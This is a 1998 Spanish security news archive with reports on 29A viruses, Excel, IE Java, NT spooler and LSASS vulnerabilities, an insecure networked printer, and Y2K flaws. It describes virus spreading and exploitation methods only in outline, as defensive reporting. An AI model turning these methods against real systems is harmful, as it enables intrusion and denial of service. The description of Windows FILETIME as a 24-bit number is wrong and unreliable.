Sendmail es el programa servidor de correo más usado en el mundo, un 70 % de los servidores instalados emplean dicho software. Una cuota conseguida a lo largo de los 20 años que lleva este programa en el mercado con lo que ha conseguido convertirse en un estándar. Por otra Sendmail ha sido y es una de las puertas más clásicas por las que los hackers accedían a los ficheros vitales del sistema, incluido el de passwords. Ello causado por una serie de bugs sumamente conocidos y fácilmente explotables.

IBM pretende luchar contra este estándar ofreciendo su software para servidor de correo electrónico Secure Mailer. Pero en esta ocasión la novedad radica en que el gigante azul, siguiendo uno de los movimientos imperantes en la Red, ofrece libremente las fuentes de su programa. Todo aquel que desee cambiarse a Secure Mailer puede bajarse gratuitamente el programa y usarlo como venía usando sendmail hasta el momento.

Ofreciendo libremente las fuentes del programa IBM espera que esta acción sirva para que los programadores de aplicaciones de comercio electrónico desarrollen mejoras y ampliaciones. Entre los aspectos destacables de Secure Mailer, IBM se pronuncia por haber mantenido un especial cuidado sobre todos los temas referentes a la seguridad y la velocidad. Asegurando que el dejar sus fuentes abiertas al público permitirá mejorar la seguridad y ampliar su uso en el comercio electrónico, uno de los pilares sobre los que apunta la estrategia comercial de IBM.

Secure Mailer se puede obtener libremente en: http://www.alphaworks.ibm.com/formula/securemailer


Antonio Ropero



lunes, 14 de diciembre de 1998

Una nueva generación de virus informáticos ha llegado

El intercambio de disquetes y aplicaciones ha sido la vía principal de transmisión de virus informáticos. Con la llegada de Internet llegan también los nuevos virus capaces de viajar por la red para infectar maquinas situadas a miles de kilómetros.
La primera muestra de esta nueva amenaza nos llega una vez más de la mano de 29A. Para los menos introducidos en éste mundo, 29A es un grupo español de programadores dedicados a la investigación y desarrollo de vida artificial, especialmente de virus informáticos.

Win32.Parvo es un virus capaz de infectar ordenadores remotos, utilizando técnicas de propagación por red. Esto significa que el virus es capaz de transmitirse desde una maquina infectada a otra mientras la primera está conectada a Internet.

En un primer análisis descubrimos que Win32.Parvo es un virus altamente polimorfo, que infecta aplicaciones tanto de Windows95 y 98 como de WindowsNT. Los programas infectados se ejecutan sin ningún problema, y el usuario puede permanecer infectado durante meses antes de descubrir que su maquina ha sido invadida.

Tras realizar varias pruebas descubrimos que Win32.Parvo infecta varias aplicaciones destinadas a Internet, especialmente el navegador y el cliente de correo. Cuando se utilizan estos programas es porque, normalmente, estamos conectados a Internet, momento que aprovechará el virus para crear una imagen virtual de si mismo en el mismo formato que los clientes de correo utilizan para mandar attachments.

Sin la intervención del usuario y sin delatar su actividad, el virus se envía a si mismo por mail. Tras este descubrimiento a todos nos surge la misma duda: ¿y a quien se envía? ¿de donde obtiene el virus las direcciones de mail de otros usuarios?

Después de trastear un poco mas dentro del código vírico nos encontramos con la respuesta. El virus se conecta a un grupo de news elegido al azar y extrae de él un mensaje cualquiera. Seguidamente busca la dirección de correo del remitente y esa será su próxima víctima.

Cuando otro usuario recibe un correo infectado, nada hace sospechar que se trata de un virus. El virus es capaz de generar distintos tipos de mensajes, hablando de distintos temas y con direcciones de origen «spoofed» (falseadas) en las que el remitente parece ser unas veces Microsoft u otras empresas. Los mensajes tienen algo en común, todos llevan un fichero adjunto en el que reside el virus, y que infectará el navegador y el cliente de correo si el usuario lo ejecuta, con lo que el ciclo de vida se completa.

Win32.Parvo presenta cualidades que le aproximan a lo que conocemos como «worms» (gusanos) puesto que no necesita infectar los programas para llegar a otras maquinas. No obstante el virus se establece dentro de varias aplicaciones de Windows para asegurar así su permanencia en el sistema.

Este virus es el pionero en este tipo de transmisión, pero sospechamos que no es mas que el comienzo de lo que será una larga lista de virus de nueva generación.


None



domingo, 13 de diciembre de 1998

El sistema militar británico indefenso ante el 2000

Según el último informe elaborado por la secretaría de defensa Británica, se detectan graves problemas en todos sus sistemas informáticos para la transición al año 2000.
Un 90% de los sistemas informáticos más importantes de la marina de su Majestad no están preparados para el cambio de milenio. Este problema no sólo afecta a la armada, ya que también se ven afectados el 65% de los sistemas de las Fuerzas Aéreas, el 82% de los Sistemas de la Secretaría de Defensa y el 50% de los sistemas del Ejercito de Tierra.

Los ordenadores que controlan los misiles Trident, también se ven afectados, lo que hace ha este problema tomar un cariz más peligroso, ya que estos misiles portan cabezas nucleares.

La falta de tiempo para poder realizar una óptima comprobación, añade una mayor peligrosidad al tema, ya que la previsión realizada por la Secretaría de Estado, estimaba que la optimización debería haber finalizado para el 31 de Diciembre de 1.998. Esto hubiera dado un margen de un año para la comprobación de todos los sistemas informáticos. Las autoridades británicas consideran tras dos años de actualización, imposible de cumplir los plazos preestablecidos.


Antonio Román



sábado, 12 de diciembre de 1998

Parche para una vulnerabilidad en Excel

Microsoft ha publicado un parche que soluciona una vulnerabilidad en Microsoft Excel 97, que podría llegar a permitir que ciertos tipos de programas fueran ejecutados sin un aviso al usuario.
Una función legal de Excel, CALL, permite a los programas ser ejecutados desde una hoja de cálculo. Si el ejecutable al que hace referencia la función es de naturaleza maliciosa, una hoja de cálculo que contenga esta función puede suponer un riesgo de seguridad para los usuarios.

Microsoft acaba de publicar un parche que desabilita totalmente esta funcionalidad. la comañía de Bill Gates, recomienda que sean los propios usuarios los que estudien su nivel de riesgo y la necesidad o no de instalar el parche.

CALL es una avanzada función en Excel que permite a una hoja de cálculo llamar a un procedimiento de una dll (Dinamic Link Library). Es una función legal y puede ser usada en macros o como una función de una hoja de cálculo. Excel genera un aviso al usuario antes de ejecutar una macro, permitiendo decidir al usuario si debe ejecutarla o no. Sin embargo, el programa no genera ningún aviso antes de ejecutar funciones de la hoja de cálculo, por lo que si se emplea de esta forma, CALL puede ser usada para llamar a una dll externa sin autorización del usuario.

Un atacante puede explotar esta vulnerabilidad incorporando una función CALL dentro de un documento Excel y enviándoselo a un usuario desprevenido. El atacante puede controlar el momento en que la función CALL se activa, bien al abrir el documento o cuando ocurra cualquier otro evento. Es importante hacer notar que la función CALL no realiza ninguna acción maliciosa por si misma y sólo sirve como medio inicial para realizar una llamada a una dll maliciosa.

Según informa Microsoft no se ha producido ningún aviso por parte de algún usuario afectado por una hoja de cálculo que haga uso de esta funcionalidad. A pesar de ello, Microsoft se adelanta a cualquier posible eventualidad publicando el parche que elimina la vulnerabilidad.

Hay que destacar que el parche corrige la vulnerabilidad desabilitando la función CALL sobre una hoja de cálculo. Sin embargo, no se elimina la posibilidad de uso de esta función en macros. La función CALL es muy poco usada dentro de hojas de cálculo, por lo que la gran mayoría de usuarios podrán usar el parche sin ninguna pérdida de funcionalidad. Sin embargo aquellos usuarios que si hagan uso de esta función dentro de hojas de cálculo no podrán aplicar el parche.

El parche se encuentra disponible en: http://officeupdate.microsoft.com/downloadDetails/xl97cfp.htm


Antonio Ropero



viernes, 11 de diciembre de 1998

«Agujeros» en los sistemas a través de periféricos inteligentes

La instalación incorrecta de periféricos inteligentes, en especial de las impresoras de última generación, pueden provocar la aparición de vulnerabilidades en los sistemas. La solución pasa por una correcta configuración de los parámetros de seguridad, que por defecto suelen ser muy débiles ó nulos.
Están saliendo al mercado multitud de periféricos inteligentes con capacidad para conectarse a Internet con su propia dirección IP, que integran procesadores equivalentes a los de un ordenador, discos duros internos para almacenamiento, e incluso con capacidad para ejecutar demonios de Internet como ftp ó telnet, como si de un servidor se tratara.

Aunque el aspecto de estos dispositivos ó las funciones que realizan no nos parezcan a priori propias de un ordenador, nos podemos encontrar con que algunos de estos sofisticados perifericos no tienen nada que envidiar a un PC. Así, la impresora Codonics NP-1600 integra una SPARC como CPU, gestionada con el UNIX de Solaris. Esto implica que la impresora utiliza cuentas de sistema así como los demonios típicos de UNIX, y para desgracia de los usuarios, sin contraseña alguna por defecto, dejando libre cualquier vía de acceso no autorizada.

El manual de usuario explica con detalle como instalar y configurar correctamente la impresora, y entre otras cosas explica como dotar de contraseña a la cuenta de root. Sin embargo, es bien sabido que la mayoría de los usuarios hacen caso omiso de las instrucciones, y en el peor de los casos ni siquiera llegan a leerlas.

Otro aspecto a tener en cuenta en su seguridad, como si de un servidor unix se tratara, es el deshabilitar todos los demonios que no sean estrictamente necesarios. Con lo que, aparte de reforzar la seguridad en general, se consigue también evitar posibles ataques DoS.

Resultado de un escaneo de puertos a la impresora Codonics NP-1600 con la configuración por defecto:

Puerto Tipo Estado

7 (echo) habilitado

9 (discard) habilitado

13 (daytime) habilitado

19 (chargen) habilitado

21 (ftp) habilitado

23 (telnet) habilitado

37 (time) habilitado

79 (finger) habilitado

111 (sunrpc) habilitado

512 (exec) habilitado

513 (login) habilitado

514 (shell) habilitado

515 (printer) habilitado

540 (uucp) habilitado

741 (UNKNOWN) habilitado

Se han llegado a conocer casos de espionaje utilizando como medio a este tipo de dispositivos. En cierta ocasión todos los trabajos de impresión enviados a una impresora HP Jet Direct eran reenviados realmente a un servidor en Internet que hacia de intermediario, para luego dirigir de nuevo la impresión a la HP. Durante todo este proceso el intruso que había manipulado el sistema podía tener acceso a toda la información que se imprimía, y de la que guardaba una copia en el servidor de Internet que hacía de intermediario.

Para evitar este tipo de actividades debemos de proceder a habilitar las contraseñas del administrador de impresión. Para comprobar que nuestra impresora no está manipulada deberemos dirigirnos a la configuración de TCP/IP del propio administrador de impresión y comprobar que la dirección IP a la que apunta corresponde a nuestro sistema.


Bernardo Quintero



jueves, 10 de diciembre de 1998

Ithaqua, un nuevo virus en escena

Un nuevo virus ha saltado a la escena. Bajo el nombre de [Ithaqua] y firmado por Wintermute/29A aparece un nuevo virus que destaca por su complejidad, aunque sus efectos no resultan en ningún caso perjudiciales.
Los afectados por este nuevo virus no sufrirán ningún daño, todo lo que hace llegado el día de su activación, curiosamente todos los 29 de abril, es mostrar un efecto de nieve cayendo por la pantalla y el mensaje «[Ithaqua] Virus by Wintermute/29A», bloqueando el ordenador y obligando a reiniciarlo.

Panda Software ha sido la primera firma en detectar este tipo de virus, y según ellos mismos afirman resulta bastante difícil de detectar. En el ámbito técnico se puede afirmar que se trata de un virus multipartite (capaz de atacar múltiples entornos), residente en memoria y de tan sólo 8030-8542 bytes de tamaño. El virus ejecerce su función infectando ficheros con extensiones .com y .exe, así como el Master Boot Record (MBR) del disco duro.

Hay que señalar que los ficheros infectados ven aumentado su tamaño con el código del virus. La gran dificultad alojada en el [Itaqua] radica en sus múltiples y variados sistemas de infección. Estos sistemas son variados en el hecho que infectan ficheros .com por el sistema EPO (Entry Point Obscuring), que consiste en seguir la pista al código del programa que lo albergará y situar donde le conviene el salto al código del virus. Para que este sistema funcione, se requiere no sólo la presencia de memoria EMS, sino que los ficheros a infectar sean de un tamaño menor a 32 KB.

Para los archivos .exe el virus dispone del método de infección por búsqueda de «huecos», o cavities, es decir porciones del archivo ocupadas por ceros (sin código). Con ello el tamaño del fichero infectado no aumenta, por lo que su visibilidad es mínima.

Ithaqua dispone de un sistema doble/simple de encriptación, siendo la primera capa polimórfica-encriptada y la segunda, únicamente encriptada. El virus oculta otros textos como «I'm Ithaqua,... that who walks over the wind, Welcome to my world, adventurer. Follow me. Love. Hate. I'll be awaiting you on the dark side, watching the nonsense. [Ithaqua] virus by Wintermute/29A».


Antonio Ropero



miércoles, 9 de diciembre de 1998

Da comienzo la III Conferencia Internacional sobre delitos cibernéticos

Ha sido inaugurada, la tercera conferencia internacional sobre el delito informático, que tendrá lugar en el Palacio de la Magdalena de Santander.
Organizada por la Guardia Civil y el Instituto Duque de Ahumada y con el incomparable marco del Palacio de la Magdalena de Santander, hoy miércoles día 9 ha dado comienzo la tercera conferencia sobre el delito informático. Las charlas que tendrán lugar hasta el próximo viernes tienen como objetivo debatir sobre las diversas materias relacionadas con la delincuencia en el mundo informático.

La primera jornada, se ha debatido el tema de la «seguridad en el comercio electrónico», teniendo como moderador al Comandante de la Guardia Civil, Ramón Cortés y como ponentes a Alfonso Calvo, Director Técnico de ACE, (Agencia de Certificación Electrónica); Manuel Medina, Director General del CERT de la Universidad Politécnica de Barcelona; Julián Inza, Director Técnico de FESTE (Fundación para la Seguridad en Telecomunicaciones, y Jesús Pita, del proyecto CERES (Fábrica de Moneda y Timbre).

Para la segunda jornada, que tendrá lugar el jueves día 10, hay previstas dos conferencias, por la mañana se tratarán los «Riesgos y oportunidades de la encriptación», mientras que por la tarde se discutirá sobre la «Seguridad en las relaciones Internet/Intranet».El acto de la mañana será moderado por Vicente Gajate, General de División de la Guardia Civil de la Jefatura de Servicios de Apoyo y contará con la presencia de José de Pastor Franco, presidente de la Asociación Española de Criptología; Arturo Ribagorda, Catedrático de Inteligencia Artificial de la Universidad Carlos III; y Johan Ten Houten, Ronald Prins y Remko Riethoven, del Laboratorio Científico Forense del Ministerio de Justicia holandés.

Para hablar sobre las relaciones Internet/Intranet se contará con ponentes como Jorge Hurtado, Director Técnico de SGI (Soluciones Globales Internet); Alejandro Garrido, de ISDEFE: Jordi Buch, Director Técnico del CERF; Robert Ralló, de la FUT (Fundación Universitaria de Tarragona) e Ignacio María Oscariz, Director Gerente de la Fundación Red de Colegios Profesionales.

Para el viernes, y para cerrar las jornadas se tratará el tema de la «colaboración policial en Internet». Con todo esto quedan cubiertos los principales temas que preocupan a la Guardia Civil en su enfrentamiento con el delito Informático.


Antonio Ropero



martes, 8 de diciembre de 1998

Parches para Mac OS 8.5

Apple tampoco se libra de bugs en sus productos. En esta ocasión el problema recae en Mac OS 8.5, la última versión del sistema operativo instalado en los ordenadores Macintosh. El error puede causar la ralentización en algunos discos duros y hasta la pérdida de datos.
Apple se ha visto obligada a lanzar Mac OS 8.5.1, para corregir los errores en el Mac OS 8.5, la última versión de su sistema operativo publicado hace menos de dos meses. De acuerdo con las instrucciones de la compañía, la nueva versión Mac OS 8.5.1 deberá ser integrada de forma inmediata en todo el hardware que se venda, incluyendo portátiles y el popular iMac. La nueva versión está ya disponible de forma gratuita en sus páginas web (www.apple.com) o bien en CD-ROM al precio de 9,95$. Las versiones en otros idiomas estarán disponibles a finales de mes.

Apple encontró que las versiones anteriores de Drive Setup (Configurador de Unidades) podía sobreescribir parte de la partición estándar Mac OS si las particiones en la unidad destino no eran como se esperaba. En los primeros anuncios del bug, se indicaban pérdidas de datos si se habían utilizado utilidades de otros fabricantes o se habían empleado utilidades de particionado de discos. La actualización ahora chequeará el sistema para asegurarse de que todos los parches necesarios se hayan instalados.

La actualización también soluciona problemas de memoria al usar AppleScript, un error de la memoria con procedimientos asíncronos de entrada/salida de ficheros, problemas con joysticks y palancas de otros fabricantes, un fallo de OpenTransport y bugs en Sherlock (nueva utilidad de búsqueda por Internet) a través de proxys.

La actualización se encuentra disponible en: http://til.info.apple.com/techinfo.nsf/artnum/n26165


Antonio Ropero



lunes, 7 de diciembre de 1998

Microsoft anuncia problemas con Windows 98 y el 2000

Se suponía y esperaba que Windows 98 el sistema operativo más moderno de Microsoft estaba plenamente preparado para superar el reto del 2000. Pero ahora, en las mismas puertas del problemático año, Microsoft anuncia que Windows 98 presenta problemas ante el cambio de milenio.
Microsoft ha anunciado que su sistema operativo Windows 98 tiene errores «menores» relacionados con el año 2000. La empresa de Bill Gates ya está preparando los parches necesarios para corregir los errores, para ofrecerlos a través de Internet y de CD-ROMs.

Microsoft (www.microsoft.com) afirma que el problema en Windows 98 viene dado por que las fechas en el 2000 serán mostradas incorrectamente en «situaciones extrañas», aunque no plantea una amenaza de pérdidas de datos. La compañía aseguró que la mayoría de los clientes tienen oportunidades de encontrar errores de Windows 98 durante el uso diario de sus programas.

Un ejemplo de los posibles errores del año 2000 encontrados en Windows 98 hace referencia al control de la aplicación de la fecha y hora. En determinados casos un usuario puede fijar la fecha al 29 de febrero de un año bisiesto y después puede hacer igual para cualquier otro año. Esto es simplemente un problema de visualización, sin embargo, el usuario no debería poder aplicar una fecha incorrecta.

Otro problema involucra al marcador telefónico de Windows 98. En el cual el fichero de diario creado después de que un usuario haga una llamada telefónica con la aplicación puede, en algunos casos, visualizar la parte del año de la llamada incorrectamente.

Además, la compañía dijo que si un sistema es arrancado en la fracción exacta de segundo en que la fecha avanza, el reloj del sistema puede visualizar una hora o una fecha totalmente inexacta. Esto es una ocurrencia realmente rara porque el marco de tiempo exacto para llevar esto a cabo es de menos de un segundo

Otros problemas del año 2000 reportados se hallan en conexión con la Máquina Virtual Java, basada en el Java Development Kit (versiones 1.1.1 a 1.1.5). Por ejemplo, si un sitio web usa Java y hace uso de la librería de clases Java.txt.SimpleDateFormet y el usuario introduce cuatro dígitos para el año, la función date puede truncar el año y usar sólo los dos primeros dígitos.

Todos estos problemas son pequeños y apenas apreciables en la mayoría de los casos, pero hasta que punto la propia Microsoft no nos oculta errores mayores y aprovecha los pequeños errores para sacar un parche que cubra todos los problemas encontrados y no anunciados.

No nos engañemos, Windows 98, un sistema operativo lanzado a tan sólo año y medio de la problemática fecha debía de estar pensado para el futuro y sin ningún problema ante el nuevo milenio. Lejos de ello, Microsoft nos sorprende con un completo repertorio de bugs con el 2000 como marco central. ¿Cuántos parches más tendremos que instalar para que nuestros sistemas no exploten al llegar el 2000? Y si esto es así con Windows 98, ¿cuántos problemas contendrá Windows 95?.


Antonio Ropero



domingo, 6 de diciembre de 1998

Mailbombing de Hotmail

Desde que Microsoft adquirió Hotmail (www.hotmail.com), el servicio de correo electrónico gratuito, ha tenido más problemas que nunca. En esta ocasión el servidor enviaba múltiples copias de algunos de los mensajes enviados, lo que pudo llegar a causar graves problemas para toda la Red..
Un error en los servidores de correo de Hotmail hizo que el popular servicio, que ya cuenta con más de 30 millones de usuarios regulares, enviara múltiples copias de algunos e-mails con la consiguiente sobrecarga en todos los servicios de correo de la Red. Esta sobrecarga de envíos ya ha sido considerada por muchos ISPs como un «mail-bombing».

Hotmail solucionó el problema rápidamente y según informó Laura Norman, product manager de Hotmail para MSN «El problema había sido causado durante un ajuste rutinario del sitio». Aunque el problema se ha solucionado, no esta claro ni cuantos usuarios fueron afectados, ni cuantos correos se llegaron a enviar en total.

No todos los e-mails fueron enviados múltiples veces, pero muchos fueron copiados varias veces y hubo un efecto multiplicador cuando los mensajes eran enviados a través de listas de correo. Mientras que algunos ISP (Proveedores de Servicios Internet) no notaron ningún problema, otros tuvieron que bloquear Hotmail para guardar sus servidores del mail-bombing, pues cada mensaje era recibido entre 15 y 20 veces.


Antonio Ropero



sábado, 5 de diciembre de 1998

Hackers contra China

El gobierno chino ha impuesto severas restricciones a los internautas de su país, impidiéndoles el acceso a las páginas alojadas en otros países. Los hackers de todo el mundo se han aliado contra estas medidas y ayudan a los usuarios chinos.
Los hackers de todo el mundo, y especialmente los americanos, centran su objetivo en China. El gobierno de esta nación está imponiendo restricciones en el uso de la Red a todos los internautas del país. De esta forma sólo pueden navegar por páginas de dominio chino, lo que es considerado como un grave ataque a la libertad de expresión y a los propios principios de Internet.

Ante estas medidas, los hackers han decidido tratar de romper las medidas de seguridad dispuestas por el gobierno. La primera acción fue entrar en la red de firewalls que impedían la salida a dominios no chinos dejándolos fuera de servicio para que los usuarios pudieran acceder a la toda información de la Red.

Otra de las medidas consistió en entrar en las páginas web de Tianjin City Network of Information of Science & Technology, en las que el gobierno chino indica a los usuarios del país las páginas a las que pueden acceder sin problemas legales. Todo ello por que acceder a recursos de fuera del país es un grave delito, como prueba, en la actualidad Lin Hai, está siendo juzgado y puede ser condenado a cadena perpetua por el "grave delito" de enviar un e-mail a Estados Unidos.

Grupos tan conocidos como «Cult of the Dead Cow» han apoyado y colaborado en esta campaña. Además, este grupo está creando una utilidad para que los usuarios del país oriental puedan acceder a cualquier web a través del correo electrónico, empleando un plug-in en los servidores proxy.

El Ministerio de Interior chino lejos de abrir las puertas al exterior las cierra aun más. Según ha informado recientemente el China Daily, (un diario de Pekin publicado en inglés), el Ministerio va a crear, en colaboración con el Beixinyuaun Automation Technology, un departamento anti-hacker para luchar contra estas acciones.


Antonio Ropero



viernes, 4 de diciembre de 1998

Bug en el JAVA del Explorer

Esta vulnerabilidad permite que mediante applets Java se puedan abrir conexiones a cualquier otra máquina en Internet. El modelo de seguridad de Java impide este bug, pero ha sido posible en el Internet Explorer 3.02 gracias a la particular implementación de la máquina virtual de Java que Microsoft nos tiene acostumbrados ha realizar en su navegador.
Los riesgos son obvios, el atacante podría poner en una web un applet de java aparentemente inocuo, con una finalidad a priori de lo más común, como puede ser algún efecto gráfico. En realidad también contendría en su interior el código para explotar este nuevo bug, por lo que cuando un usuario descargara este applet de java podría estar de manera oculta conectándose a un tercer sistema para bajarse información confidencial, haciendo de puente al atacante. En éste sistema quedaría registrado que el usuario que había descargado el applet ha sido el que ha sustraído la información, y el verdadero atacante quedaría en el anonimato.

Otra posibilidad que puede darse es que alguien dentro de una red protegida por un firewall descargue el applet de la web hostil. El applet podría conectarse a ordenadores de la red interna, recoger información, y suministrarla al atacante a través del firewall, sin conocimiento alguno por parte de la víctima.

El bug tiene su origen en que Microsoft Internet Explorer permite que los applets abran conexiones de nuevo al servidor de dónde vinieron, con la particularidad de que si el servidor envía una nueva dirección HTTP el navegador de la víctima sé redirige al URL indicado. El código es simple:

Response.Redirect ("http://" & Request.QueryString ("dondesea"))

La solución de Microsoft pasa por instalar la versión 4 del Internet Explorer. Para aquellos que quieran continuar con su IE 3.02 deberán instalar la nueva máquina virtual de Java disponible en http://www.microsoft.com/java/vm/dl_vmsp2.htm


Bernardo Quintero



jueves, 3 de diciembre de 1998

USA nos exporta sus restricciones criptográficas

Los Estados Unidos y la administración Clinton no contentos con imponer su severa política de exportación de material criptográfico han convencido a otras 33 naciones, entre las que se incluye España, para que sigan sus directrices en esta materia.
En una reunión celebrada ayer jueves tres de diciembre, las 33 naciones que firmaron el acuerdo de Wassenaar (www.wassenaar.org) limitando la exportación de armamento se mostraron de acuerdo en imponer controles a las tecnologías más avanzadas de encriptación de datos, incluyendo el software destinado al mercado de masas. Entre las naciones firmantes de este acuerdo se encuentran potencias como Japón, Alemania y Gran Bretaña.

De esta forma Estados Unidos ha conseguido convencer a otras naciones de que sigan sus mismas directrices en la materia de exportación de software de encriptación de datos.

Compañías de alta tecnología estadounidenses, como Microsoft e Intel, se habían quejado de que la carencia de restricciones en otros países obstaculizaba su capacidad de competir al exterior. La industria pedía que las restricciones americanas se relajaran o eliminaran totalmente, pero no ha pedía controles más apretados en otros países.

Los abogados de la privacidad también se han opuesto firmemente a los controles de la exportación en el cifrado de los EE.UU., discutiendo que las tecnologías de encriptación proporcionarán los medios cruciales para proteger la privacidad en la era digital.

La nueva política excluye específicamente del control a aquellos productos, como películas o grabaciones enviadas a través de Internet, que usen la encriptación para proteger la propiedad intelectual del copiado ilegal.

Según las claves del acuerdo firmado, los países miembros del tratado restringirán las exportaciones de productos de encriptación general que usen claves superiores a 56 bits, los productos destinados al mercado de masas tendrán una limitación de 64 bits.

Ahora será cada uno de los países los que deban redactar sus propias leyes para la implementación del acuerdo. Las 33 naciones firmantes de este restrictivo acuerdo son las siguientes: Argentina, Australia, Austria, Bélgica, Bulgaria, Canadá, República Checa, Dinamarca, Finlandia, Francia, Alemania, Grecia, Hungría, Irlanda, Italia, Japón, Luxemburgo, Holanda, Nueva Zelanda, Noruega, Polonia, Portugal, República de Corea, Rumanía, Rusia, República Eslovaca, España, Suecia, Suiza, Turquía, Ucrania, Reino Unido y Estados Unidos.

En estos momentos en HispaSec mostramos una gran preocupación por lo que pueda representar este tratado, esperando que no afecte a la libertad y la privacidad de todo el mundo. ¿Cuál es el futuro del PGP? ¿Qué pasará con la versión internacional de PGP? ¿Cuál es la opinión de las compañías que se puedan ver afectadas por la restricción? Todo parece indicar que cada día nos quieren dificultar más la libertad y poner más trabas a la privacidad.


Antonio Ropero



miércoles, 2 de diciembre de 1998

Nuevas vulnerabilidades en NT

Dos nuevos agujeros que consiguen una Denegación de Servicio en Windows NT han salido a luz. Por su parte, el reciente Service Pack 4 se muestra insuficiente una vez más para solucionar estos problemas.
Se esperaba el Service Pack 4, como la solución que podía resolver todos los problemas de seguridad en torno a NT. Los administradores llevaban mucho tiempo esperándolo, pero cuando por fin Microsoft publica este parche, parece que no representa la solución deseada y cada día aparecen nuevos problemas que se muestra incapaz de resolver.

En esta ocasión le ha tocado el turno a dos conocidos exploits de sendos componentes de NT. El NT Spooler Service (spoolss.exe) y el Local Security Authority SubSystem (LSASS). Ambos ataques requieren accesos a puertos usados específicamente por sistemas Windows (TCP y UDP 135-139), que deberían ser bloqueados por el firewall de la empresa. Todo usuario que bien desde dentro de la empresa, o desde fuera tenga acceso a dichos puertos, podría causar desde problemas simples, hasta situaciones críticas en los servidores NT.

La vulnerabilidad del servicio del spooler del NT, conocida como spooleak, se aprovecha de un agujero, perfectamente documentado, en la memoria del spooler de impresión de NT. El cual se encarga de procesar los trabajos enviados por los clientes a la cola de impresión del servidor. Conectando con el spooler vía un pipe con nombre y enviando datos al azar, se puede explotar el agujero de la memoria y hacer que el spooler (spoolss.exe) ocupe al 100% los recursos de la CPU bloqueando el servidor.

Por defecto, esta conexión debe ser inicializada sobre una sesión nula, lo que significa que incluso los usuarios sin autentificar pueden hacer uso de este agujero. Para desabilitar el ataque sobre una sesión nula se debe borrar la línea "SPOOLSS" de la clave HKeyLocalMachine\System\CurrContrlSet\Services\LanmanServer\Parameters\NullSessionPipes(REG_MULTI_SZ) del registro. Aun así, esto no evitará que los usuarios autentificados sean capaces de atacar el servicio.

La segunda vulnerabilidad, es realmente un fallo posterior al SP3 que parece resurgir de nuevo. En su momento, se publicaron dos parches conocidos como «lsa-fix» y «lsa2-fix» que solucionaron numerosos problemas con LSASS. Este servicio realiza la autentificación de la password del login, pasada a través del proceso WinLogon contra el Security Account Manager o cualquier otro paquete de autentificación.

Uno de los problemas de LSASS ocurría cuando los clientes enviaban una petición malformada al LSA sobre un pipe con nombre, matando a lsass.exe e impidiendo así la conexión local a esa máquina. El archivo causante de todo esto fue identificado como el lsaserv.dll, y la versión parcheada que se encontraba en la Microsoft Knowledge Base en el artículo Q182918, resolvía el problema. Pero en la actualidad el SP4 introduce una nueva versión de esta dll que se muestra vulnerable al exploit. Como era de esperar, no se puede aplicar el antiguo «lsa2-fix» sobre el SP4.

El punto en común de ambos exploits se encuentra en el uso indebido del Remote Procedure Call (RPC) sobre pipes con nombre como canal de ataque a un servidor NT. Pero parece ser que estos no son los únicos problemas inherentes a este servicio. Microsoft es incapaz de evaluar todas las vulnerabilidades posibles a través de este sistema, aunque ya ha publicado un informe y una versión sin testear totalmente de un parche. El parche, que se recomienda que sólo se instale en caso de total necesidad, se puede encontrar en el último boletín de Microsoft a este respecto (http://www.microsoft.com/security/bulletins/ms98-017.asp).


Antonio Ropero



martes, 1 de diciembre de 1998

NT no se libra del 2000

Cuanto más nos acercamos al 2000 mayor es la preocupación y más conscientes somos del problema que se puede plantear. Parecía que el problema sólo se podía achacar a ordenadores y sistemas antiguos pero las evidencias vienen a demostrar lo contrario, NT Server 4.0 el sistema estrella de Microsoft también se ve afectado por el problema.
NT Server 4.0 empieza a dominar el mundo empresarial y el 2000 se acerca peligrosamente. Nadie podía pensar que un problema como el del año 2000 podría afectar a software nuevo como los recientes sistemas operativos y las suites de Microsoft pero recientes descubrimientos demuestran que nadie está libre del problema. Después de instalar el último Service Pack para Windows NT éste sistema sigue presentando problemas con el 2000 y la forma de mostrar las fechas en ciertas aplicaciones.

Windows NT incluye dos estructuras para tratar la fecha y la hora, que utilizan diferentes cantidades para medir el paso del tiempo. FILETIME es un número de 24 bits basado en el número de intervalos de 100 nanosegundos que han pasado desde el 1 de enero de 1601. Pero SYSTEMTIME es un número de 16 bit que representa la fecha y la hora basadas en el tiempo transcurrido desde el año 1980. Estos dos formatos de tiempo interactuan con diferentes tipos de aplicaciones y aunque ambos son capaces de manejar fechas hasta el siglo 22 los programas deben estar configurados para aceptar el formato de año con cuatro dígitos proporcionado por el sistema operativo.

En NT 4.0 las estructuras SYSTEMTIME y FILETIME entran en juego cuando se ejecutan archivos NetShow y el Message Queue Server que mantiene todos los mensajes de eventos del sistema. En NT se almacenan todas las fechas empleando el sistema de cuatro dígitos para el año, salvo los dos mencionados.


Antonio Ropero